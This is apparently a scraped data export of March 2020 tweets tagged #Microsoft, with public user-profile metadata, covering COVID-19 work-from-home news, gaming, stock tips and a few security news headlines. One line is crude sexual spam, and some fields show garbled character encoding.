    <t>{'id': 1200095986028175363, 'id_str': '1200095986028175363', 'name': 'Olgaar Technologies', 'screen_name': 'olgaartech', 'location': 'Tindivanam', 'description': 'OlgaarTech is a buddying startup expertise in result-oriented Digital Marketing and Web designing focused on growing businesses â€“ smarter, better and faster.', 'url': 'https://t.co/PfDnwQQtuA', 'entities': {'url': {'urls': [{'url': 'https://t.co/PfDnwQQtuA', 'expanded_url': 'https://www.olgaartech.com', 'display_url': 'olgaartech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Thu Nov 28 16:56:05 +0000 2019', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 37, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200096066885996544/sXCDmPUI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200096066885996544/sXCDmPUI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1200095986028175363/1582613768',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</si>
  <si>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07:43:53 +0000 2020</t>
  </si>
  <si>
    <t>Ready for the pitch session for #NFP #IWD2020 at #microsoft 
#EachforEqual https://t.co/iaBpnNq10B</t>
  </si>
  <si>
    <t>{'id': 67911695, 'id_str': '67911695', 'name': 'Michelle at Microsoft @TechGirlWA', 'screen_name': 'msandfor', 'location': 'Perth, WA', 'description': 'Empty Stack Developer, Microsoftie, Tedx Speaker, ACS Chairman WA, Community Advocate. Pythonista. Making a difference in Games. She/Her', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5082, 'friends_count': 3915, 'listed_count': 506, 'created_at': 'Sat Aug 22 15:31:27 +0000 2009', 'favourites_count': 15161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 46373,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'http://pbs.twimg.com/profile_images/1030021687813623808/4E8JUfIT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1030021687813623808/4E8JUfIT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/67911695/1567856936',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</si>
  <si>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07:43:46 +0000 2020</t>
  </si>
  <si>
    <t>Amazon, Google, Facebook, and #Microsoft are asking staff to work from home https://t.co/jR7epbHkZP</t>
  </si>
  <si>
    <t>{'id': 6987882, 'id_str': '6987882', 'name': 'Angsuman Chakraborty', 'screen_name': 'angsuman', 'location': '', 'description': '.', 'url': 'https://t.co/sGKeFb4RKg', 'entities': {'url': {'urls': [{'url': 'https://t.co/sGKeFb4RKg', 'expanded_url': 'https://www.facebook.com/angsuman.chakraborty', 'display_url': 'facebook.com/angsuman.chakrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8066, 'friends_count': 5328, 'listed_count': 1075, 'created_at': 'Thu Jun 21 07:50:02 +0000 2007', 'favourites_count': 20067, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 239865, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1034304248962408449/X4-_O1FN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1034304248962408449/X4-_O1FN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6987882/1492671374', 'profile_link_color': 'F46C00', 'profile_sidebar_border_color': 'D6D2F5', 'profile_sidebar_fill_color': 'EBF5FF', 'profile_text_color': '245423', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 07:41:42 +0000 2020</t>
  </si>
  <si>
    <t>Today Tomb Raider 2013 turns 7 Today #tombraider #LaraCroft #tombraiderteboot #Microsoft #Xbox #XboxOne #XboxOneX #XboxSeriesX https://t.co/cJBBGF0LwL</t>
  </si>
  <si>
    <t>{'id': 1040745662650830848, 'id_str': '1040745662650830848', 'name': 'Tyler Waters', 'screen_name': 'Lovethefastlive', 'location': 'California, USA', 'description': '18\nI am pretty much a gamer and a fan of anime and always in the mood to spend time with my family and friends', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Fri Sep 14 23:34:36 +0000 2018', 'favourites_count': 697, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 431, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1179605602219069440/dG3qax5F_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179605602219069440/dG3qax5F_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1040745662650830848/1570396161',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</si>
  <si>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07:40:00 +0000 2020</t>
  </si>
  <si>
    <t>AMD's Next Gen RDNA 2 GPU Detailed- 50% Better Performance and HW RayTracing Support, Roadmap Updated
 #7nm #amd #console #games #gaming #gpu #microsoft #raytracing #sony #technology #vrr https://t.co/Y0g0eFgp1L https://t.co/IS2v1YYASt</t>
  </si>
  <si>
    <t>{'id': 139426220, 'id_str': '139426220', 'name': 'AbhiFxTech', 'screen_name': 'abhifxtech', 'location': '', 'description': '', 'url': 'https://t.co/GvYAhCGcrn', 'entities': {'url': {'urls': [{'url': 'https://t.co/GvYAhCGcrn', 'expanded_url': 'http://abhifx.com', 'display_url': 'abhifx.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 64, 'listed_count': 0, 'created_at': 'Sun May 02 15:35:12 +0000 2010', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 591,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'http://pbs.twimg.com/profile_images/1172120717116133376/CqGh1UVZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172120717116133376/CqGh1UVZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/139426220/1568255167',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</si>
  <si>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07:38:26 +0000 2020</t>
  </si>
  <si>
    <t>#Chrome and the new #Edge support Progressive Web Apps #pwa now. Very nice feature to provide #O365 apps to users easily without the install and update hassle! #microsoft #google</t>
  </si>
  <si>
    <t>{'id': 155940921, 'id_str': '155940921', 'name': 'Marcus Erber', 'screen_name': 'eMarcusNet', 'location': 'Vienna, Austria', 'description': 'Senior IT Architect at s-IT Solutions for collaboration services and the workplace of the future. Views are my own!', 'url': 'http://t.co/9rqovOhmDQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/9rqovOhmDQ', 'expanded_url': 'http://emarcus.net', 'display_url': 'emarcus.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 344, 'friends_count': 218, 'listed_count': 39, 'created_at': 'Tue Jun 15 15:37:38 +0000 2010', 'favourites_count': 259, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2031, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00416B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/527140565054275584/Run5Dd_d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/527140565054275584/Run5Dd_d_normal.jpeg', 'profile_link_color': '00416B', 'profile_sidebar_border_color': '00416B', 'profile_sidebar_fill_color': '3A7AA6', 'profile_text_color': 'AAAAAA', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 07:37:12 +0000 2020</t>
  </si>
  <si>
    <t>Either it will be #BlackFriday or #BlackMonday 4 #StockMarket. #microsoft got #coronavirus now. After #Pence visit to #WashingtonState its clear administrion has no clue or plan to deal w/ #COVID19 #covidseattle</t>
  </si>
  <si>
    <t>{'id': 399229641, 'id_str': '399229641', 'name': 'FJ', 'screen_name': 'yesnoyess', 'location': '', 'description': 'IT &amp; Fintech Sr. Manager', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 104, 'listed_count': 1, 'created_at': 'Thu Oct 27 05:46:51 +0000 2011', 'favourites_count': 155, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2883,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'http://pbs.twimg.com/profile_images/1212015984044756994/fhaxFw4s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212015984044756994/fhaxFw4s_normal.jpg',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</si>
  <si>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07:35:15 +0000 2020</t>
  </si>
  <si>
    <t>Investors Chronicle:
Tips of the Week
#Cranswick (#CWK)  Buy
#HSBC (#HSBA)  Sell
#CapitalandCountiesProperties (#CAPC)  Sell
#HummingbirdResources (#HUM)  Buy
Updates:
#Microsoft (#MSFT US)  Buy
#Ashtead (#AHT)  Buy
#ShantaGold (#SHG)  Buy
#XP Power (#XPP)  Hold</t>
  </si>
  <si>
    <t>{'id': 1021665025537306624, 'id_str': '1021665025537306624', 'name': 'Robert Barron, MCSI', 'screen_name': 'RobBarronInvest', 'location': 'London/Cambridge', 'description': 'Investment Manager. Stock Market Enthusiast. Click through to LinkedIn if you would like to know more!', 'url': 'https://t.co/uTWtt8RVf9', 'entities': {'url': {'urls': [{'url': 'https://t.co/uTWtt8RVf9', 'expanded_url': 'https://www.linkedin.com/in/robertbarron2/', 'display_url': 'linkedin.com/in/robertbarroâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 773, 'friends_count': 1046, 'listed_count': 6, 'created_at': 'Tue Jul 24 07:54:58 +0000 2018', 'favourites_count': 1877, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4676, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1021666986558976000/Px_mYlPM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021666986558976000/Px_mYlPM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1021665025537306624/1532438228',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</si>
  <si>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07:35:09 +0000 2020</t>
  </si>
  <si>
    <t>Logicalis awarded Microsoft Azure Expert MSP status #realtimerecruitment #microsoft #MicrosoftAzure #MSP https://t.co/ld34dGnErM https://t.co/9QCvoPGEjF</t>
  </si>
  <si>
    <t>{'id': 63677644, 'id_str': '63677644', 'name': 'Niall McNiff', 'screen_name': 'realTimeNiall', 'location': 'Dublin', 'description': 'Dad of 2, realTime recruitment owner - 20 yrs IT recruitment, lover of sport - LFC, Down GAA, Rugby, Golf-RCD,Castle,  Tweets mine', 'url': 'https://t.co/bbY5hIQ3Ag', 'entities': {'url': {'urls': [{'url': 'https://t.co/bbY5hIQ3Ag', 'expanded_url': 'http://www.realtime.jobs', 'display_url': 'realtime.jobs', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 210, 'friends_count': 345, 'listed_count': 17, 'created_at': 'Fri Aug 07 09:47:17 +0000 2009', 'favourites_count': 287, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 537,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'http://pbs.twimg.com/profile_images/452096313568423938/rYtxirpt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/452096313568423938/rYtxirpt_normal.jpeg',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</si>
  <si>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07:35:06 +0000 2020</t>
  </si>
  <si>
    <t>Amazon, Google, Facebook, and Microsoft are asking staff to work from home : https://t.co/e1pgYE5Mgm #Facebook #Google #Amazon #Microsoft Comments: https://t.co/Nua1xVhD80</t>
  </si>
  <si>
    <t>{'id': 702365900310253569, 'id_str': '702365900310253569', 'name': 'Hacker News', 'screen_name': 'hacker_news_hir', 'location': '', 'description': 'Facebook mirror page:  https://t.co/OXolU6Aphx', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/OXolU6Aphx', 'expanded_url': 'https://www.facebook.com/hn.hiren.news/', 'display_url': 'facebook.com/hn.hiren.news/', 'indices': [23, 46]}]}}, 'protected': False, 'followers_count': 310, 'friends_count': 0, 'listed_count': 434, 'created_at': 'Wed Feb 24 05:34:14 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 131561,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'http://pbs.twimg.com/profile_images/702366612574310401/2aGa7WKL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/702366612574310401/2aGa7WKL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/702365900310253569/1461211751',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</si>
  <si>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07:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Ori and the Will of the Wisps pre-load is now available, download size is 10.05 GB.
https://t.co/JUZQYJgTay
#Oriandthewillofwisps #Games #PCGames #XboxOneGames #XboxOneX #Xbox #Microsoft #MicrosoftStudios #Ori #Steam #MoonStudios https://t.co/qMaBFMRZYm</t>
  </si>
  <si>
    <t>{'id': 804111860, 'id_str': '804111860', 'name': 'TheNerdMag', 'screen_name': 'thenerdmag', 'location': '', 'description': 'TheNerdMag brings you latest news and rumors from #Gaming and #Tech Industry including Games, Apps, Smartphones, Hardware updates and How-to Tutorials.', 'url': 'http://t.co/lTTEjrVJ0r', 'entities': {'url': {'urls': [{'url': 'http://t.co/lTTEjrVJ0r', 'expanded_url': 'http://thenerdmag.com', 'display_url': 'thenerdmag.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 400, 'friends_count': 33, 'listed_count': 6, 'created_at': 'Wed Sep 05 07:59:38 +0000 2012', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3477,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'http://pbs.twimg.com/profile_images/552842411416616961/1kPbL2fx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/552842411416616961/1kPbL2fx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/804111860/1407087974',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</si>
  <si>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07:34:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will pay hourly #workers regular wages even if their hours are reduced because of #COVID19 concerns https://t.co/45CTYe3iEW https://t.co/EB7hkGaSRW</t>
  </si>
  <si>
    <t>{'id': 842103497541746693, 'id_str': '842103497541746693', 'name': 'realizetoday', 'screen_name': 'realizetoday', 'location': 'United States', 'description': 'i am realize and i want to realizing of new things. Different cultures, places, natures, techs, musics, lifes, become a part of world.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1040, 'friends_count': 2167, 'listed_count': 23, 'created_at': 'Wed Mar 15 20:01:34 +0000 2017', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45431,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'http://pbs.twimg.com/profile_images/1216665973790531584/jos1qeqb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216665973790531584/jos1qeqb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/842103497541746693/1578910748',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</si>
  <si>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07:34:31 +0000 2020</t>
  </si>
  <si>
    <t>Download this update from https://t.co/eI3KXNxLL7. Oh, sorry, that was malware on a hijacked sub-domain. Oops 
https://t.co/10KjwzOpJ6 
via @theregister
#security #hijacked #subdomain #Microsoft #malware #news #TheRegister</t>
  </si>
  <si>
    <t>{'id': 1102793344785178625, 'id_str': '1102793344785178625', 'name': '#Offender_archive ðŸ•', 'screen_name': 'btjp01', 'location': 'For better webðŸ•ŠðŸ€', 'description': 'Net watcherðŸ‘©\u200dðŸ’»(#commentary),interest :#net,#social,#security,#history/ex-spam/scam blocker /ï¼ BlockTogether user,MyList:Max125k: #732k| #BTJP01ðŸ•, Fav,RTâ‰ E.', 'url': 'https://t.co/DZkvaLJEVN', 'entities': {'url': {'urls': [{'url': 'https://t.co/DZkvaLJEVN', 'expanded_url': 'https://blocktogether.org/show-blocks/1MXu7d5hXAaeYddNS0pMxOknoVYhIDv2v2ujSIhG', 'display_url': 'blocktogether.org/show-blocks/1Mâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 3634, 'listed_count': 1, 'created_at': 'Tue Mar 05 04:49:57 +0000 2019', 'favourites_count': 20339, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28711,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'http://pbs.twimg.com/profile_images/1102814194578194432/5O_tVoh5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1102814194578194432/5O_tVoh5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1102793344785178625/1552889370',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</si>
  <si>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07:33:21 +0000 2020</t>
  </si>
  <si>
    <t>What a great feeling. I just submitted my first #Microsoft #MVP nomination for a wonderful community contributor. It's exciting having the opportunity to recognize others through the award program. #MVPBuzz #NowTheWaitBegins #MEM #MEMCM #MEMPowered https://t.co/9kjGQZRvg1</t>
  </si>
  <si>
    <t>{'id': 256353066, 'id_str': '256353066', 'name': 'Adam Gross [MVP] - ASquareDozen.com', 'screen_name': 'AdamGrossTX', 'location': 'Houston, TX', 'description': 'ChristFollower, Microsoft MVP, Desktop Architect, ConfigMgr, Intune, Blogger, Consultant @SCDudes, Speaker @ MMSMOA MMSDE MMSJazz ExpertsLiveUS HASMUG', 'url': 'https://t.co/0PwAgqu0wt', 'entities': {'url': {'urls': [{'url': 'https://t.co/0PwAgqu0wt', 'expanded_url': 'http://www.asquaredozen.com', 'display_url': 'asquaredozen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3612, 'friends_count': 599, 'listed_count': 71, 'created_at': 'Wed Feb 23 04:29:09 +0000 2011', 'favourites_count': 13735, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9810,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'http://pbs.twimg.com/profile_images/1138551022798954496/5DKH464t_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138551022798954496/5DKH464t_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/256353066/1557723272',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</si>
  <si>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07:33:00 +0000 2020</t>
  </si>
  <si>
    <t>7 #Tips To #SpeedUp #Windows Bootup
Make #Windows10/8/7 Faster
#Microsoft #Desktop #Laptop #PC #Tech #RAM #System #Computer #Guide #Howto #fixed #Technology #technews #DIY #problogbooster #HP #Dell #WindowsInsiders #tipsandtricks 
https://t.co/SrFakZlLJD</t>
  </si>
  <si>
    <t>{'id': 72578201, 'id_str': '72578201', 'name': 'ProBlogBooster', 'screen_name': 'ProBlogBooster', 'location': 'London', 'description': 'ProBlogBooster publishes #bloggingtips, #howto guides, #SEO, #makingmoneyonline, #affiliatemarketing, #mobileapp #Reviews and #tutorials. Follow Now.', 'url': 'http://t.co/ggLDVw2J2R', 'entities': {'url': {'urls': [{'url': 'http://t.co/ggLDVw2J2R', 'expanded_url': 'http://www.problogbooster.com', 'display_url': 'problogbooster.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 233, 'friends_count': 17, 'listed_count': 25, 'created_at': 'Tue Sep 08 15:21:35 +0000 2009', 'favourites_count': 221, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1861, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '022330', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1027197503312195584/8nEhtm_o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027197503312195584/8nEhtm_o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/72578201/1512578851', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'C4BAC4', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 07:30:17 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join guys
@Tanu7069 @Gurdeep0003 @satyapaljain_86 @ShilpiVarshne15 @shail2810 @VaishaliMaisur2 @Soniyaskjain1</t>
  </si>
  <si>
    <t>{'id': 745934301989081088, 'id_str': '745934301989081088', 'name': 'Maryam', 'screen_name': 'maryamabdkhan', 'location': 'Mumbai, India', 'description': 'New on Twitter. \nDoctor to be. \nContestFreak.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 279, 'friends_count': 881, 'listed_count': 9, 'created_at': 'Thu Jun 23 10:59:31 +0000 2016', 'favourites_count': 9405, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18020, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228768524782329856/0Kct3Byy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228768524782329856/0Kct3Byy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/745934301989081088/1578854552',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</si>
  <si>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07:21:13 +0000 2020</t>
  </si>
  <si>
    <t>"#Microsoft will continue to pay all our vendor hourly service providers their regular pay during this period of reduced service needs. This is independent of whether their full services are needed."
#COVID19
https://t.co/hgAAzvLkdy</t>
  </si>
  <si>
    <t>{'id': 14566379, 'id_str': '14566379', 'name': 'Bruno Borges', 'screen_name': 'brunoborges', 'location': 'Vancouver, British Columbia', 'description': 'Brazilian Immigrant ðŸ‡¨ðŸ‡¦ðŸ‡§ðŸ‡·ðŸ‡ºðŸ‡¸ Java Champion and Principal Product Manager for #Java â˜•ï¸ @Microsoft. Previously @OracleDevs and #Azure DevRel.', 'url': 'https://t.co/1r8ESKHPWH', 'entities': {'url': {'urls': [{'url': 'https://t.co/1r8ESKHPWH', 'expanded_url': 'https://brunoborges.io', 'display_url': 'brunoborges.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16976, 'friends_count': 966, 'listed_count': 721, 'created_at': 'Mon Apr 28 06:54:07 +0000 2008', 'favourites_count': 64993, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 53937,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'http://pbs.twimg.com/profile_images/1151543517505658880/FicKfgDO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151543517505658880/FicKfgDO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14566379/1539883100', 'profile_link_color': '1B95E0',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'regular'}</t>
  </si>
  <si>
    <t>Fri Mar 06 07:21:00 +0000 2020</t>
  </si>
  <si>
    <t>It's time for business leaders to hold themselves accountable for creating #inclusive and diverse work environments, says #Microsoft's @PhillipsLani. 
#SheSoars @GlobalWIC #IWD2020 #WomenInTech #TechNativeTV https://t.co/AhV0TamBBW</t>
  </si>
  <si>
    <t>Fri Mar 06 07:18:38 +0000 2020</t>
  </si>
  <si>
    <t>I like how #Microsoft is doing a lot to take responsible actions in light of the consequences of the #CoronaVirus, like protecting the income of hourly workers: https://t.co/As83v1nSFv Bravo!</t>
  </si>
  <si>
    <t>{'id': 220996300, 'id_str': '220996300', 'name': 'Kostja Klein', 'screen_name': 'KostjaKlein', 'location': '', 'description': 'Microsoft Data Platform MVP and passionate Community guy from Germany. Foodie as well.', 'url': 'http://t.co/QtFVcgjVPJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/QtFVcgjVPJ', 'expanded_url': 'http://kostjaklein.wordpress.com', 'display_url': 'kostjaklein.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1564, 'friends_count': 753, 'listed_count': 154, 'created_at': 'Mon Nov 29 13:03:53 +0000 2010', 'favourites_count': 1609, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5185,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'http://pbs.twimg.com/profile_images/913520081887535104/9iW82eyl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913520081887535104/9iW82eyl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/220996300/1506778238',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</si>
  <si>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07:16:12 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqGyFe #microsoft #xbox #xbox360 #gaming #darkness https://t.co/dv3v9xJ581</t>
  </si>
  <si>
    <t>{'id': 539722403, 'id_str': '539722403', 'name': 'Ogreat Games', 'screen_name': 'OgreatGames', 'location': 'Check Us out!', 'description': 'Enjoy video game updates, cool content, &amp; everything else in this twitter feed of https://t.co/AqlVtAZvtR!', 'url': 'https://t.co/AqlVtAZvtR', 'entities': {'url': {'urls': [{'url': 'https://t.co/AqlVtAZvtR', 'expanded_url': 'https://www.ogreatgames.com', 'display_url': 'ogreatgames.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/AqlVtAZvtR', 'expanded_url': 'https://www.ogreatgames.com', 'display_url': 'ogreatgames.com', 'indices': [82, 105]}]}}, 'protected': False, 'followers_count': 13577, 'friends_count': 8695, 'listed_count': 110, 'created_at': 'Thu Mar 29 06:27:06 +0000 2012', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 74831,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'http://pbs.twimg.com/profile_images/2624719093/vujahrx8ltbdjd7c3qjt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2624719093/vujahrx8ltbdjd7c3qjt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/539722403/1423680953',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</si>
  <si>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07:15:17 +0000 2020</t>
  </si>
  <si>
    <t>I move my ass on the dick really fast #Chattanooga   #microsoft #night https://t.co/IYSY2q6Nv8</t>
  </si>
  <si>
    <t>{'id': 1235725325201543168, 'id_str': '1235725325201543168', 'name': 'Vicki Smith', 'screen_name': 'naysiggera', 'location': 'Stamford, USA', 'description': 'A great marriage is not when the â€˜perfect coupleâ€™ comes together. It is when an imperfect couple learns to enjoy their differences.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 16, 'listed_count': 0, 'created_at': 'Fri Mar 06 00:34:16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'http://pbs.twimg.com/profile_images/1235728616010461184/I-KW22iT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235728616010461184/I-KW22iT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235725325201543168/1583455703',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</si>
  <si>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07:14:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft: 99.9% of compromised accounts did not use multi-factor authentication https://t.co/vYGrlggtOy #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>{'id': 24428801, 'id_str': '24428801', 'name': 'Robert', 'screen_name': 'TheCheekyTaurus', 'location': 'Concord, California', 'description': 'Husband, lover of dogs (Border Collies in particular). Native Texan. I make things go. ðŸ³ï¸\u200dðŸŒˆ\n \nGen X is very disappointed in you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1673, 'friends_count': 652, 'listed_count': 151, 'created_at': 'Sat Mar 14 20:59:08 +0000 2009', 'favourites_count': 18406, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 103904,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'http://pbs.twimg.com/profile_images/893969823813713920/HLq23PkG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/893969823813713920/HLq23PkG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24428801/1397571525', 'profile_link_color': '91D2FA',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</si>
  <si>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07:12:55 +0000 2020</t>
  </si>
  <si>
    <t>Free posters at @microsoftnl #Microsoft  Linux, #Azure https://t.co/mSIHos6Yii</t>
  </si>
  <si>
